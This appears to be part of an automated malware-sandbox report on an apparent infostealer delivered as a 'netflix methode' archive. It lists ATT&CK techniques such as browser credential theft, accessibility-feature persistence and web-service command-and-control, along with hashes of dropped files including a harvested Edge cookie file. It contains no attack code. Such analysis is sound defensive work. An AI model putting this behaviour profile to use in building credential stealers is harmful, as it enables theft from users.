C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious use of SendNotifyMessage
PID:4748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Privilege Escalation

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\setup.exe.log

Filesize
1KB

MD5
547df619456b0e94d1b7663cf2f93ccb

SHA1
8807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3

SHA256
8b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a

SHA512
01b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ecf7ca53c80b5245e35839009d12f866

SHA1
a7af77cf31d410708ebd35a232a80bddfb0615bb

SHA256
882a513b71b26210ff251769b82b2c5d59a932f96d9ce606ca2fab6530a13687

SHA512
706722bd22ce27d854036b1b16e6a3cdb36284b66edc76238a79c2e11cee7d1307b121c898ad832eb1af73e4f08d991d64dc0bff529896ffb4ebe9b3dc381696

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4dd2754d1bea40445984d65abee82b21

SHA1
4b6a5658bae9a784a370a115fbb4a12e92bd3390

SHA256
183b8e82a0deaa83d04736553671cedb738adc909f483b3c5f822a0e6be7477d

SHA512
92d44ee372ad33f892b921efa6cabc78e91025e89f05a22830763217826fa98d51d55711f85c8970ac58abf9adc6c85cc40878032cd6d2589ab226cd099f99e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
7c55ce97065c4c00468d4ca7007dee3d

SHA1
348aa8fe31142429d5ec4891d8d94ea16912ee39

SHA256
df707a27449114a6d064ad2344823673fda59b482dce4e83371ede551e930645

SHA512
0a3b9fe6852c3c2cb6fb90f128dd5f72cbf129e1197f3e1de8d5135eb74d462d2eb274b2f81f674e0056f6ad1155e52d40aa2af9703dd4a6415d949ff0031aad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
fa484296116e6ca63065a5a67abd091e

SHA1
659721bc24bd6d1e9635c3c9cffd23f0ece7da07

SHA256
e8666a2bdb015705d5c1ffafe315dbc7b2d505acac292e6c53c101982c9ccd1f

SHA512
aa459e8be5b6a160199fe6bffa893aa8abfa3e8db1cc8e9ef8b0238e0f5460e1796230e2e8d896627f9b06818aa6ccc6025e6ac6d5af0704acbc2c52e26600f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
40KB

MD5
7371141f3cc6ab87e1fc7f7b66bd3b09

SHA1
6cbdce5e7dfd015347c331846c0f8da6e17fb38c

SHA256
2c21275c6e84250b31e715cba4c8b3b1902b13cddb2c4910413d195c527c363e

SHA512
3d4331b47766d0994ea28f6d1d3805d26ea21309643660c466f422c293db22b41050770925d47afe28e16d952eb53f41165c1b0d488e2452b94620d448821fba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
40KB

MD5
09fecb204542b4f7c14de97e138a821d

SHA1
fb5aa24ea966f233e0a981299eec6d3d9118431d

SHA256
711d7f8515c02f24aece980bc0cb18559b10f5a4eecd0d4b483dcad85c591255

SHA512
823d34bf55f88016c312e493faf62001a60a9dc35533818fff95b8f07206207d162d4bee66157185e1f03dff04cdf8ca04df51cf3fded48a930e99a1975c68b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
2KB

MD5
2e82f5d7fd8ee8d0eb68a8446a172e65

SHA1
9ef01407421f0ced86ef07f922924e5b55bc996c

SHA256
26df93c875cbf44f4c75316a0f85a21754b6e00db56b663128044206b4a39f4d

SHA512
1afb4c6364ae22c9ead338646e8cb4aa482e99ee7ccf259042143c3d667f1ba6e8b653b06fa1b87332227cca97a38365b3421e0ce9812b116dc3c164f887b430

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
4d38ca86a2d836476019aea92aa3f709

SHA1
32d237d63556a2c9b91b17c7e56eb2969bc901c9

SHA256
61ee286ca0759f4c53bc73786634cca2feadb09a072dbca5e8f34c5170e6a77a

SHA512
4421c2d9af30a6427694beeb16bf3f1442c9cf8bc787e1c2178bd638f7b3f6d774b0d1a1f737323c0e2c64794ed32f4a68f2e71ff89878004b832d7232d333c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
6KB

MD5
843173b09411ab6e4b6685d192fde17f

SHA1
61f640fa70b2051f1215bbb8f0f72d1e08dfa35f

SHA256
d438a363d9d64cdebdda5e2310ea5ae353343d7bb9b718a473adf49d2349c8a9

SHA512
c63cefcd91282318b03fcc5ee36fd28c1dd0dcba0cbcd9dd159468274d623f31c3c06bdb91ed5b43a29f323ec0ccd5722f0a5b1b381f860a668fc3892d0c1353

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
7KB

MD5
cd7e8955be42f050b35c381c64dad305

SHA1
5a120f558cfab7e2d8cc1cba98283a0302fabc9f

SHA256
6efbdd11954490908405d96115afea61c0b3c69ee914532b8225118e0cda3906

SHA512
5826f8a91c881c1d03aef9715f9f6d7c3d5e9726ed50b2b11398f845f2b43f943c6c8c3566ae1f7175502b2338db4285192b46d937ca33a9255d8b4277b0833d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
5277cf2b62cb2356ff0c806992a39bf1

SHA1
8856a8da03da0c83a04ca44ba1c0f259ad631a14

SHA256
43a8bc3fc8af9623a65ef43d17fd32d937902c8875b26a5a0d31730780a114d3

SHA512
113456fe303329ffa52e9188a9bf6cfdafe6f6d266c6242888dd35311e40623239a967c82b5eb8641c29be741551788cfc28e9c108135e7ae6f3ec3a551d6856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
212ddbcfdd60f14b2d204abf87d42153

SHA1
3171f102f6259079cbff1dd64a2b51aeb8842b2a

SHA256
b730de97bfdb4b75f08b5e939bda6586e04f60845379c8ba1b1faa999863afa0

SHA512
c904483a9f48bafd70a9c67348744911d836034cc905523013b7a74e36237c6c50f827a07916bd47421099ad632ae3b3d76f4d0f74707fe49f8f517126405261

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
fa9a4520c0589bf26b13e64ffd924226

SHA1
2acd5b27718142a6c9c477db2a45cc41b942ef30

SHA256
90c3b9abd39f85e6e94fe44443cdba906f10f25c812bf273128a21430f6b05d1

SHA512
7f5a54ded6b6dfa8d65e600bdfbd36b87cee3137d76a8aa9e96ff35c686867af23ecd527d03ce3f3ec938cfe6614d2a1e89907617a9a92566e6aee217bf442df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
a380dda3ec171d0182d7116d9a90460e

SHA1
8e5d6144848cfadf541f08f1a3572224922e0fbc

SHA256
37d82d952fcda1dc4f70fa38d623a4b06cdab226fc77beae2ab858599cc428b8

SHA512
c9c891fa4c855f1488ca873a29b4c52e515e0ba26b1f0af1cb8b5d56ec99830c03b21cadcfcebfad1e4aac845b55cc67757bcf0992a0f57d73e41945d571f767

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
a5d399dc0f810c99ae9b6f30cb63eb4c

SHA1
b9a868abc3585f29fd4a676dec1a840c1540e028

SHA256
b2420681d0c323119a6c91cbe163378dee9f3ee08f2cac96bd78245ac15e8cce

SHA512
6589a71e2b818e727c78ad3fafa494d9e961f2a05302eb9adcf9370632aff0587522979b387004cbb6f99d159a6eb5fa4c229b6d95ba11cabed2c56773d50788

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
45bd65718d4f15ec36eca5583ec62fbf

SHA1
f83967cdcd58bc3a3a7d6ea43095cb604e582155

SHA256
629a931b104a846077a24f09d7db56e8df7896f458708b47bda07117f921e48f

SHA512
eaa7bf4fc6ddd94bcd129f73eff754d23da733e189ccc8f3a5c0dc13672701e53b839c46ba6b6b1a70d0453c0ca7f8da2b1a8ecbc8f65f19360a17cf51eca0bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1157047720d021b15972bf2aeefff9e8

SHA1
5aa61978308edffac165dabb8face1c75ce661e4

SHA256
7035f2b19ca901e3cd7e83fbaa40cc5c383e8b2e2b93bfc126585aebcf61ccd6

SHA512
d88274abf36b53af1982d331273fb8b3e4ba72c7262c63bad3ca7096c7bebac785d911bff65b910d93a68a2413d2c47fb7e2742e0a823bb15bc39f4210eab2a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
6c31b04c40bba3e23183d0beee1e9944

SHA1
09e3a64cb099b726c41c10b87e58f79ad0f8ef45

SHA256
83d063701516252f8b88d4a28d71c3c58dabebbb1bd16b09aafbaaeb11b188ab

SHA512
77682dff8dfb5505e9efb79acd736ee9360b69831f46fa69a7e82093b8bc26fb562f4de4dda5f43a15f34b2e89d9c448799f519890d5b200613e472c59bdb3f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
949d58a24796f7f7b5d4250c5b161694

SHA1
a58da58986adee528e2979658dac316703d8bc78

SHA256
f54acf84f942e320ebf751e0eed015bb7340dd45999a22bdd77eb40dc0347157

SHA512
d1c21bb9b1da3620d5857dc7d00f6a346f864487feb44d23de2bddf45b69f04f87ff8b3fc04be89124e02ece0cbcecf85d4dcbf389c31cd7eb35c19a2db84d50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
312133e35c77acee869081d70889e2a7

SHA1
1687624ec8bf58bac560ff5a0e482dddbc14262d

SHA256
e6fa2de8cd8e0b00fc373bd143fcb8f3566519b0aa2d9518a92caa523daaa03d

SHA512
1e707b7edc4c5d6b70e340cb680bc28c23ec4f055f8b99bac530cee0be1cb5afa9bafa19e082b6fd5d8ce6c073c46b22fc5208fbfa2dce9c67b9654163a38ce5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
5a66a25c9c61fc4efe95886b4743f391

SHA1
ee4094b60e6b8f27ec477b79345813b97eea4535

SHA256
f62ad0a05bffa43ee9b1aa93fe769d1910ee887c77eb260e4e129a57e32d77c9

SHA512
c073393e6ea4f2d415688cb9abbc74d69de0b90111eb3846de1f8daa87c031909cb50fe9a9870640341d509a7dd7fdecc548e2d4398d0678d5eca912e76ce65c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
cdbb7912a757b62b09a1d0db3cef837f

SHA1
8f94597510c6bbfbe54ef0b6af56f87b5d5af833

SHA256
8e097efa01a9f84494a32816ec12024fc095b3cd5068f41f30e77445ebf9812b

SHA512
9552b3b0d8f07be3666a9de53ef657705c556ad73d75af6ee1ab35eff050e0d1587ac6990247a2c0f4dbe9c342a5fa02f514bff8f6e954b3a75d27078b1dfc53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5880d3.TMP

Filesize
705B

MD5
d819984911c55e3b8dd5b712ca43d12c

SHA1
870a1a568b2a219923c08540d2b08247ebfe7790

SHA256
aa55316782311964257f28da30b14c6be0c7a7c5ba5c0ba88a568c0701f65c21

SHA512
a55cf71f59c5a2385b2a80934a94a5c260fb96a4b0a2ae6f2c849974484c45f6780a1d3c540d2d048eac7b6164138b1ce42520dd5f95d67bd7246cee213a8965

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
765e934d79374e50f73923dab2bbdc31

SHA1
e45957249150a22d184728253dee4dcf477016f0

SHA256
3f7d370bacdab49b20886258b82a3492016552a10125980df5f51db399bba222

SHA512
dbd2b991a0916ac4586cc2f73bdee9309dccadf23647d523733c8556b1cdd881df09eb4a921095828d138f8d9bb1fedbcea428ae425e5bc9c5650417141c44af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d79312c662ea72ec2a755886f24515b9

SHA1
6569a436314b141b20a1d5e077ada852fd029eef

SHA256
769fcbf3b155649f533de15eaab9d8501474fa7d26c40690625e22b35d5e8155

SHA512
6e7db0f8f0621110ad1da289c87c28c9016216a1a4743b3ef7c8ff847e0f96ecf4a5283d8892dcae4fe711c5bc6eb42026829fb0d9bd3c16a0f8e68d45c33838

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
2cce9185f69d93854e965fe2d94bd3b5

SHA1
f96d0de7f798720fcb66af305d94f19d4843783c

SHA256
223af6f389b29808cf8b48fe936137ec7a5c1fdd710173a91e704f9f6603e20f

SHA512
0cba166f0cb07b1a6f968c25e537f4b6b97f8cb4d49f61e372650023279108d58ee0746b85289f23ae375835f88a0f4058de08b8f729b6889ef20bf0aafe6602

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4955459081b0c524b916905827ff8481

SHA1
6069cbeee1e0da0e3d807dfc6313b6d3b263a01f

SHA256
c18872f89f7042631a9a21606292b1ed14d1df5ec4a48fa36790ae4410e7ce4c

SHA512
84c0afbe8b74d659be5d4491d1a162e0a4b40ffec5ab40756aa25e3630012ae2967eef330e906e8a75d7a9eddd72e1e6068040c63238c2274cb896df5cab6118

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
f4bf3ca8753d6bb9725419fec1ec74b9

SHA1
71fce9d17d1d92873236a9a827c52eb9e4827f3d

SHA256
ca8697e4ada4c3d4aac2899b8aad4052ccd605fccee05ee0a831368bde2f7417

SHA512
a55a107ae8bcf833ea674413c765cd55096146c9634dff41884fcc851c12fe47753308099525c99ae44883facfb668c8b292dd915263f34ebd1190391cb28a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f64c8e242b57eb3a41e3429b022caa26

SHA1
0b331a408a19864325779eb803e355c95b426e40

SHA256
2c35f2b13724632136fad1a26c04db50b46901947600ca7d63477ddf2506cd5d

SHA512
2e5c4e237952e3a914ac369b6676dd75a496395ddf3bbc49bc9fac139ffb69c69013bb44191d9afede8925f48b80e9f5eeab69a834f4615dd085119f2c59f28e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
724bc7abdbaa4bb021d728aac3000af1

SHA1
8bb319c3ef68cf5db7d56a1e397c94ca65d2cce6

SHA256
07d38b887ae11e664a613dc698d8de4771dec3cdb7837d59b00f421114e27c04

SHA512
501872716cea55c46ccb0c5ccf6835733f84e5a653a285729b6757c38952a582985fb7c76643cda0b32390ea9bca4de35d2fbe34ba1c6f3106f803225cafd88e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
fd9484672be177a3cead9df73211c5ea

SHA1
7ed28d755a5ed19498d40ef6c2f8f5dd2e22e0a2

SHA256
79a4c3944a24bfc916b9f4f0fe25323445645672ddbcd880792af973ad0b326e

SHA512
8a47530dbd219f93ecb9dd096de0b17ff187d5535447a98d747d1e45c4a4252b27000de1878d40666cd97ef03f0774aef80acad1893561b6694c128c835182b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b0a78e60bfb279d18fd3d6e7a67411f5

SHA1
9344fe3654a14bc66afb9dc6ea215fabfbe5c906

SHA256
a28890c82033d3deaf5770ecd1b0239c77321acc93704b1d4b1e167b91e30aeb

SHA512
9548be23bec645cd705482f78d43b63659e38cf879c34f7071f42fd86ee02039379a5e92fbe0f1c74c12aaebabdd8002f57eba111d3e855cbd0c89a110e346f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bf4000150e94b70dbfc86c011e976e24

SHA1
37dc8f6710fea0de86fe4defcb249b906fe2571d

SHA256
5851375b6fe2a272102f4ef2d6655aa0c791726d6bca6f20080a704d032bb800

SHA512
69a9b7719a4d40f724a476ac367445da93f303708f7560ba8fb21c8aed2f1058b8bdb6115e1bbee7128bab7cf5bbad38613d2a78c8b607004e5629bbd1a40cb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a66967e08ea7ef122df7a577ffbce29

SHA1
93d41fdb109880348a770035d6168c53e3558373

SHA256
c8c6b25cc1b5ca7fd7468d37028dbb7bd0236f665ddb0c833f2f92cc122cf2e6

SHA512
c5bc577897161d08f55c8b89b6ac2e4148f3b83ecb5d2fce43879bbe66befc37039a768a70489993c018e69476bd0369ebef39697d3a81481b1eec28a124cc9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
bc6bb59ecfce265d0cd96fd0ba620cf5

SHA1
d453f29bde83aaa3fc3e989187435cd6f13cc113

SHA256
d91f16150088b3bd9f49bcc04c826274b7d75c2cb0af663023c64fa447eb81d7

SHA512
2a4c87e9f60279bb862842ad4019035b6a29470ac331a9d4a01808ce424322eb06b35fef88b305334dd44289328c03de1dabc389443a7347fcd48f9280c3f38a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7az3fwiWbKKPU4t

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\Jgfff1b5RkAbnCb

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejrfq023.sve.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xROfZOdWrnWXJY0\Browsers\Cookies\Edge Cookies.txt

Filesize
10KB

MD5
cdeda6efab26665c64201aef65971909

SHA1
40f2a1908fc464aa8587ea5f3a1470099e1477c4

SHA256
b03211689c1957c632a54022a9405d76c48d6029275b3d2cd8efe02288141f49

SHA512
9dabad0da3605d6ad2571ba57ea9a091220ad2977b5618f11e2a91e85569f04210e1caa8f07c98cf7a8411f006b0c83e783e889d748c1f1ba0aaccc5491e1215

Download Submit
C:\Users\Admin\AppData\Local\Temp\xzTGR2Q3SqO7nsO

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 137804.crdownload

Filesize
254KB

MD5
9ce2078226604a0ed5e9d15018fcc852

SHA1
7e5b42ccb09946997a41cbba3360b14941f30560

SHA256
dfd4357cd27ad2660259827b1b1f61acfcb45481868ff87b686e3cd9bafc483e

SHA512
0c760176b2608a474365570276b760b71120dfce6d974eb21f092458d28677bc694d360291eda2361d2ca75aa91f268ea2c4a1399e5db38002e5d676d9e6b335

Download Submit
C:\Users\Admin\Downloads\netflix methode .rar

Filesize
101KB

MD5
f4626baf8bcc9e6b6698a4811ba782d9

SHA1
3db5e06470c81cb478d6faed4c756eed20728b99

SHA256
b71a70ae39b98584840d684d07dcad9eba4106930417cc8486324177f903a6b5

SHA512
606009d894d89184cbcc645909579a4d53a925aede4dc1e3db70d020b2cc36fdb4280757fe8857f641c99bad13ee8b639ec310f40bc5396ca91bfd3475719dfd

Download Submit
memory/708-741-0x000001E0FDBA0000-0x000001E0FDBC2000-memory.dmp

Filesize
136KB

Download
memory/1120-771-0x0000019041970000-0x000001904198E000-memory.dmp

Filesize
120KB

Download
memory/1120-769-0x00000190419E0000-0x0000019041A30000-memory.dmp

Filesize
320KB

Download
memory/1120-809-0x00000190419C0000-0x00000190419CA000-memory.dmp

Filesize
40KB

Download
memory/1120-740-0x000001903FCF0000-0x000001903FD36000-memory.dmp

Filesize
280KB

Download
memory/1120-767-0x000001905A4E0000-0x000001905A556000-memory.dmp

Filesize
472KB

Download
memory/1120-810-0x0000019041A50000-0x0000019041A62000-memory.dmp

Filesize
72KB

Download
memory/4748-990-0x0000018F0E4A0000-0x0000018F0E4A1000-memory.dmp

Filesize
4KB

Download
memory/4748-989-0x0000018F0E4A0000-0x0000018F0E4A1000-memory.dmp

Filesize
4KB

Download
memory/4748-988-0x0000018F0E4A0000-0x0000018F0E4A1000-memory.dmp

Filesize
4KB

Download
memory/4748-994-0x0000018F0E4A0000-0x0000018F0E4A1000-memory.dmp

Filesize
4KB

Download
memory/4748-1000-0x0000018F0E4A0000-0x0000018F0E4A1000-memory.dmp

Filesize
4KB

Download
memory/4748-999-0x0000018F0E4A0000-0x0000018F0E4A1000-memory.dmp

Filesize
4KB

Download
memory/4748-998-0x0000018F0E4A0000-0x0000018F0E4A1000-memory.dmp

Filesize
4KB

Download
memory/4748-997-0x0000018F0E4A0000-0x0000018F0E4A1000-memory.dmp

Filesize
4KB

Download
memory/4748-995-0x0000018F0E4A0000-0x0000018F0E4A1000-memory.dmp

Filesize
4KB

Download
memory/4748-996-0x0000018F0E4A0000-0x0000018F0E4A1000-memory.dmp

Filesize
4KB

Download